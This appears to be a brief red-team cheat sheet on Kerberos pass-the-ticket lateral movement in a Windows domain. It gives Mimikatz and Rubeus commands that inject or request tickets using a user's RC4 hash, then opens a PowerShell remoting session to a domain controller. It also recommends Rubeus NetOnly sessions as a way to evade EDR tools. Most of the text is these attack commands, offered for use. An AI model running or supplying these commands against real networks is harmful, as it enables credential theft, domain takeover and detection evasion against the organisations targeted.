Powershell Remoting

PowerShell remoting is a feature that allows users to run PowerShell commands or scripts on remote computers. It's built on the WinRM service

Mimikatz

kerberos::ptt "C:\Users\carni7\Desktop\Mimikatz\[0;7f830]-5-2-43f10000-carni7@krbtgt-amogus.kek.kirbi"
Enter-PSSession -ComputerName DC01

Rubeus

Rubeus.exe asktgt /domain:amogus.kek /user:carni7 /rc4:1293uo1uwfoi1hw081 /ptt
Enter-PSSession -ComputerName DC01

Rubeus NetOnly Session

We can use createnetonly options to make NetOnly session, which don't have access for local machine, but could access services. Later we could use Rubeus /ptt command to insert TGT. NetOnly sessions are less detectable and could evade some EDR's.

Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show